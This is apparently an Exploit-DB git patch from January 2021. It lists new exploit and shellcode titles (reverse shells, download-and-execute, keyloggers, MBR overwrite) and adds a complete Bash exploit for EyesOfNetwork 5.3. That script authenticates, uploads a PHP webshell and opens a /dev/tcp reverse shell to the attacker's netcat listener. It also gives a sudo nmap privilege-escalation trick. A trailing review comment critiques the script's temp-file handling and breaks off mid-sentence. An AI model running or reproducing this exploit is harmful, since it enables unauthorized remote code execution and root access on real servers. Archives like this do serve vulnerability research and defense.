From 969e7d6c903569251340738f23c4d02a631607d1 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 16 Jan 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-01-16 13 changes to exploits/shellcodes Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS E-Learning System 1.0 - Authentication Bypass & RCE POC Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit) PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS) Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF) Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection EyesOfNetwork 5.3 - File Upload Remote Code Execution BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes) BSD/x86 - execve(/bin/sh) + Encoded Shellcode (49 bytes) FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes) FreeBSD x86/x64 - execve(/bin/sh) + Anti-Debugging Shellcode (140 bytes) FreeBSD/x86 - setreuid() + execve(pfctl -d) Shellcode (56 bytes) FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes) FreeBSD/x86 - execve(/bin/sh) + Encoded Shellcode (48 bytes) Linux/PPC - read + exec Shellcode (32 bytes) Linux/PPC - read() + exec Shellcode (32 bytes) Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Append RSA Key To /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 
bytes) Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes) Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive + Payload Loader Shellcode (68+ bytes) BSD/x86 - symlink . /bin/sh Shellcode (32 bytes) BSD/x86 - symlink /bin/sh Shellcode (32 bytes) Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes) Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes) Linux/x86 - Add Root User (toor) To /etc/passwd + No Password + exit() Shellcode (107 bytes) Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) Linux/x86 - execve(_/bin/sh__ _0__ _0_) With umask 16 (sys_umask(14)) Shellcode (45 bytes) Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) Linux/x64 - setuid(0) + chmod (/etc/passwd 0777) + exit(0) Shellcode (63 bytes) Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes) Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes) Linux/ARM - chmod(/etc/shadow 0777) + Polymorphic Shellcode (84 bytes) Linux/ARM - chmod(/etc/shadow 0777) Shellcode (35 bytes) Linux/x86 - Bind (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes) Linux/x86 - Bind (6778/TCP) Shell + Polymorphic + XOR Encoded Shellcode (125 bytes) Linux/ARM - Bind (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode Linux/ARM - Bind (0x1337/TCP) Listener + Receive + Payload Loader Shellcode Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) Linux/SuperH (sh4) - setuid(0) + chmod (/etc/shadow 0666) + exit(0) Shellcode (43 bytes) Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit) Windows - Download File + Execute Via DNS + IPv6 Shellcode (Generator) (Metasploit) Linux/MIPS (Little Endian) - system() Shellcode (80 
bytes) Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid() + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts Shellcode (77 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (77-85/90-98 bytes) Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes) Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes) Windows/x64 (XP) - Download File + Execute Shellcode Using PowerShell (Generator) Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes) Linux/MIPS (Little Endian) - chmod(/etc/passwd 666) Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) Linux/x86 - execve(/bin/sh) + ROT13 Encoded Shellcode (68 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts + Obfuscated Shellcode (98 bytes) Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) Linux/x86 - Custom execve() + 'Followtheleader' Shellcode (Encoder/Decoder) (Generator) Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) Linux/x86 - mkdir(HACK) + chmod 777 + exit(0) Shellcode (29 bytes) Linux/x86 - Reboot() Shellcode (28 bytes) Linux/x86 - reboot() Shellcode (28 bytes) Linux/x64 - execve() Encoded Shellcode (57 
bytes) Linux/x64 - execve() + Encoded Shellcode (57 bytes) Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) Windows/x86 - Download File (//192.168.1.19/c) Via WebDAV + Execute Null-Free Shellcode (96 bytes) Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes) Windows - Keylogger To File (./log.bin) + Null-Free Shellcode (431 bytes) Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes) Windows - Keylogger To File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes) BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator) Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing Via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes) BSD/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes) Linux/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes) BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (31 bytes) Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes) Linux/x86 - Audio (knock knock knock) Via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes) Linux/x86 - Remote File Download Shellcode (42 bytes) Linux/x86 - Download File Shellcode (42 bytes) Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes) Linux/x86 - reboot() + Mutated + Null-Free Shellcode (55 bytes) Linux/x86 - execve wget + Mutated + Null-Free 
Shellcode (96 bytes) Linux/x86 - execve(wget) + Mutated + Null-Free Shellcode (96 bytes) Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes) Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes) Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes) Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + Execute Shellcode (108 bytes) Linux/x86 - execve(/bin/sh) Using jump/call/pop Shellcode (52 bytes) Linux/x86 - Copy /etc/passwd To /tmp/outfile Shellcode (97 bytes) Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) Linux/x64 - execve(/bin/sh -c reboot) Shellcode (89 bytes) Linux/x64 - mkdir() Shellcode (25 bytes) Linux/x64 - mkdir(ajit) Shellcode (25 bytes) IRIX - Bind (/TCP)Shell (/bin/sh) Shellcode (364 bytes) IRIX - Bind (/TCP) Shell (/bin/sh) Shellcode (364 bytes) Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes) Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes) Linux/ARM - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (79 bytes) Linux/ARM - chmod(/etc/passwd 0777) Shellcode (39 bytes) Linux/x64 - Execute /bin/sh Shellcode (27 bytes) Linux/x64 - execve(/bin/sh) Shellcode (27 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (110 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (96 bytes) Linux/x64 - shutdown -h now Shellcode (65 bytes) Linux/x64 - shutdown -h now Shellcode (64 bytes) Linux/x64 - /sbin/shutdown -h now Shellcode (65 bytes) Linux/x64 - /sbin/shutdown -h now Shellcode (64 bytes) Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode Linux/x86 - NOT Encoder / 
Decoder - execve(/bin/sh) Shellcode (44 bytes) Linux/x64 - execve(/bin/sh) + Custom Encoded XOR Shellcode Linux/x64 - execve(/bin/sh) + Custom Encoded XOR + Polymorphic Shellcode (Generator) Linux/x64 - execve(/bin/sh) + Twofish Encoded + DNS (CNAME) Password + Shellcode Linux/x86 - execve(/bin/sh) + NOT Encoder / Decoder Shellcode (44 bytes) Linux/x64 - x64 Assembly Shellcode (Generator) Linux/x64 - execve() Assembly Shellcode (Generator) Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes) Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (37 bytes) Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + (Dual IPv4 and IPv6) Shellcode (146 bytes) Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + IPv4/6 Shellcode (146 bytes) Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes) Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (28 Bytes) Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (20 Bytes) Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) Linux/x86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes) Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (4 Bytes) Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes) Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes) Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) Linux/x86 - execve(/usr/bin/head -n99 cat etc/passwd) Shellcode (61 Bytes) Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes) Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator) Linux/x86 - 
execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + Execute Shellcode (119 bytes) Windows/x86 (XP Pro SP3) - Download File Via TFTP + Execute Shellcode (51-60 bytes) (Generator) Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes) Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes) Linux/ARM - Reverse (192.168.1.124:4321/TCP) Shell (/bin/sh) Shellcode (64 bytes) Windows/x86 - Download File (http://192.168.0.13/ms.msi) Via msiexec + Execute Shellcode (95 bytes) Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes) Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes) Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes) Linux/x86 - Add User (sshd/root) To /etc/passwd Shellcode (149 bytes) Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes) Linux/x86 - cat .bash_history + base64 Encode + cURL (http://localhost:8080) Shellcode (125 bytes) Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes) Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) Shellcode (91 Bytes) (Generator) Linux/x86 - Shred file (test.txt) Shellcode (72 bytes) Linux/x86 - Shred File (test.txt) Shellcode (72 bytes) Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes) Linux/x64 - execve(/bin/sh) Shellcode (23 bytes) Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) + Reposition + INC Encoder Shellcode (66 bytes) Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes) Windows/x86 - Download File (http://192.168.10.10/evil.exe _c:\evil.exe_) Via bitsadmin + Execute Shellcode (210 Bytes) Linux/x86 - Chmod + Execute (/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes) Linux/x86 - chmod + execute(/usr/bin/wget http://192.168.1.93//x) + Hide Output 
Shellcode (129 bytes) Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes) Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (140 bytes) Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes) Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes) Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + mmap() + read() Stager Shellcode (60 Bytes) Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (8 Bytes) Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Using JMP-CALL-POP Shellcode (21 bytes) Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes) Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes) Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes) Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes) Linux/x86 - chmod(/etc/shadow_ 0666) + Polymorphic Shellcode (53 bytes) Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (107 bytes) Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes) Linux/x86_64 - execve(_/bin/sh_) + AVX2 XOR Decoder Shellcode (62 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes) Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes) Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (107 Bytes) Linux/x86 - Bind (43690/TCP) + Null-Free Shellcode (53 Bytes) Linux/x86 - execve(/bin/sh) + NOT + XOR-N + Random Encoded Shellcode (132 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse 
Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Windows/7 - Screen Lock Shellcode (9 bytes) Linux/x86 - Add Root User (vl43ck/test) To /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) To /etc/passwd Shellcode (74 bytes) Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) Socket Reuse Shellcode (42 bytes) Linux/x86 - execve(/bin/sh) + NOT|ROT+8 Encoded + Null-Free Shellcode (47 bytes) Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Free Shellcode (188 bytes) Linux/x86 - execve() + Alphanumeric Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) + Random Bytes Encoder + XOR/SUB/NOT/ROR Shellcode (114 bytes) Windows/x64 (7) - Screen Lock Shellcode (9 bytes) Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) Windows/x86 - WinExec Calc.exe + Null-Free Shellcode (195 bytes) Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes) Linux/x86 - Reboot + Polymorphic Shellcode (26 bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) Linux/ARM - execve /bin/dash Shellcode (32 bytes) Windows/x86 - MSVCRT System + Dynamic Null-Free + Add RDP Admin (MajinBuu/TurnU2C@ndy!!) 
+ Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Password (P3WP3Wl4ZerZ) + Null-free Shellcode (272 Bytes) Linux/ARM - execve(/bin/dash) Shellcode (32 bytes) Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes) Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes) --- exploits/multiple/webapps/49432.sh | 132 +++++++++++ exploits/multiple/webapps/49435.rb | 112 +++++++++ exploits/php/webapps/49426.html | 26 ++ exploits/php/webapps/49427.txt | 22 ++ exploits/php/webapps/49428.txt | 22 ++ exploits/php/webapps/49429.txt | 25 ++ exploits/php/webapps/49430.txt | 33 +++ exploits/php/webapps/49431.txt | 34 +++ exploits/php/webapps/49433.txt | 14 ++ exploits/php/webapps/49434.py | 93 ++++++++ files_exploits.csv | 10 + files_shellcodes.csv | 224 +++++++++--------- .../{windows => windows_x86-64}/47953.c | 0 13 files changed, 635 insertions(+), 112 deletions(-) create mode 100755 exploits/multiple/webapps/49432.sh create mode 100755 exploits/multiple/webapps/49435.rb create mode 100644 exploits/php/webapps/49426.html create mode 100644 exploits/php/webapps/49427.txt create mode 100644 exploits/php/webapps/49428.txt create mode 100644 exploits/php/webapps/49429.txt create mode 100644 exploits/php/webapps/49430.txt create mode 100644 exploits/php/webapps/49431.txt create mode 100644 exploits/php/webapps/49433.txt create mode 100755 exploits/php/webapps/49434.py rename shellcodes/{windows => windows_x86-64}/47953.c (100%) diff --git a/exploits/multiple/webapps/49432.sh b/exploits/multiple/webapps/49432.sh new file mode 100755 index 000000000..6a5a1afe2 --- /dev/null +++ b/exploits/multiple/webapps/49432.sh 
@@ -0,0 +1,132 @@
+# Exploit Title: EyesOfNetwork 5.3 - File Upload Remote Code Execution
+# Date: 10/01/2021
+# Exploit Author: Ariane.Blow
+# Vendor Homepage: https://www.eyesofnetwork.com/en
+# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
+# Version: 5.3-10 (12/9/2020-lastest)
+
+#!/bin/bash
+
+# (/!\) You may have change this string : "user_id=1; user_limitation=0; group_id=1" if you are not the admin user in the admin group, you find this in the cookies params /!\
+
+###############################################
+# (Authentified) #
+# Abritraty file upload #
+# It whase a Challenge to do that in BASH #
+# But the exploit's working fine ! #
+# ........... #
+# Exploit is working with the actual version #
+# Scripted on 01/10/2021 #
+# By Ariane.Blow #
+# https://ariane.agency/ #
+###############################################
+banner()
+{
+clear
+echo " ,*-."
+echo ' | |'
+echo ' ,. | |'
+echo ' | |_| | ,.'
+echo ' `---. |_| |'
+echo ' | .--`'
+echo " | |"
+echo " | |"
+echo ""Ω
+echo " ! DO NOT USE IF YOU DONT HAVE PERSMISSION !"
+echo ""
+echo " EyesOfNetwork 5.3-10"
+echo ""
+echo " RedTeam Tool"
+echo ""
+echo " Input verification desertion"
+echo ""
+echo " RCE via Arbitrary FileUpload"
+echo ""
+echo ""
+}
+VAR()
+{
+#var
+#Beacause I don't whant to see all the *.sh in my OPT directory ... BashMan Tips xD !
+mkdir /tmp/EON53
+cd /tmp/EON53
+#you can not upload more than 1 file with a same URL and same filename, i just add a random char at the end of URL and in the filename
+export random=$(cat /dev/urandom | tr -dc 'bcdfghjklmnpqrstvwxz' | head -c 9)
+export filename=shell$random.xml.php
+echo "EyesOfNetwork IP :"
+read eonIP
+echo "HackerIP (used to start the listener) :"
+read hackerIP
+echo "Hacker PORT (used to start the listener):"
+read PORT
+echo "Username (default = admin) :"
+read username
+echo "password :"
+read password
+}
+#Getting the session_id
+GetSessionID()
+{
+echo "getting sessionID ... 
" +echo "curl -i -s -k -X $'POST' -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://$eonIP/login.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 20' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' --data-binary $'login=$username&mdp=$password' $'https://$eonIP/login.php' | grep session | cut -d ';' -f 1 | cut -d '=' -f 2" >> GetSession.sh +chmod +x GetSession.sh +sessionID=$(./GetSession.sh) +echo "sessionID acquired : $sessionID" +sleep 3 +echo +} +#start listener +start_listen() +{ +printf "\e[31;1m When the Reverse-Shell is etablished, you can PrivEsc with :\e[0m \n" +echo "echo 'os.execute(\"/bin/sh\")' > /tmp/nmap.script" +echo "sudo nmap --script=/tmp/nmap.script" +printf "\e[31;1m ... I Know ... \e[0m \n" +echo "gnome-terminal -e 'nc -lnvp $PORT'" >> listen.sh +chmod +x listen.sh +./listen.sh +} +#POST payload +Payload() +{ +echo "Sending PostRequest ..." 
+echo "curl -i -s -k -X $'POST' \ + -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------123135855827554554412483984802' -H $'Content-Length: 1565' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Referer: https://$eonIP/module/admin_itsm/modification_itsm.php' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ + -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ + --data-binary $'-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url_id\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url\"\x0d\x0a\x0d\x0ahttp://HackMe.ImFamous$random\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"fileName\"; filename=\"$filename\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0a /dev/tcp/$hackerIP/$PORT 0>&1\'\");\x0a\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"input_file_name\"\x0d\x0a\x0d\x0ashell.xml\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_type_request\"\x0d\x0a\x0d\x0aget\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_header[]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; 
name=\"itsm_var[0][var_name]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][champ_ged_id]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_parent\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_return_champ\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aadd_external_itsm\x0d\x0a-----------------------------123135855827554554412483984802--\x0d\x0a' \ + $'https://$eonIP/module/admin_itsm/ajax.php' | grep success" >> req.sh +chmod +x req.sh +./req.sh +} +#Get request on PHP exploit +Req_payload() +{ +echo "Get request on the PHP payload ..." +echo "curl -i -s -k -X $'GET' \ + -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \ + -b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \ + $'https://$eonIP/module/admin_itsm/uploaded_file/$filename'" >> reqGET.sh + +chmod +x reqGET.sh +./reqGET.sh +} +#Clearing +Clear_cache() +{ +echo "clearing cache" +rm listen.sh +rm req.sh +rm reqGET.sh +rm GetSession.sh +cd .. +rmdir EON53 +} + +#MAIN +banner +VAR +GetSessionID +start_listen +Payload +Req_payload +Clear_cache \ No newline at end of file 
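Review bot: `VAR()` works in the fixed, predictable directory `/tmp/EON53` without checking that `mkdir` succeeded, and `GetSessionID()`, `Payload()` and `Req_payload()` then append (`>>`) generated scripts holding the typed password and the session cookie into it and execute them. On a shared host, and with a typical umask, another local user can read those files or own the directory beforehand, and a stale file left by an aborted run is executed again because of the append. A private directory with cleanup on exit avoids this: `workdir=$(mktemp -d) || exit 1; cd "$workdir" || exit 1` followed by `trap 'rm -rf "$workdir"' EXIT`, which also covers the paths where `Clear_cache()` is never reached. The `#!/bin/bash` line sits below the header comments, so it is an ordinary comment and should move to line 1. For defenders of the affected product, the sequence visible here (a multipart POST to `/module/admin_itsm/ajax.php`, then a GET under `/module/admin_itsm/uploaded_file/` for 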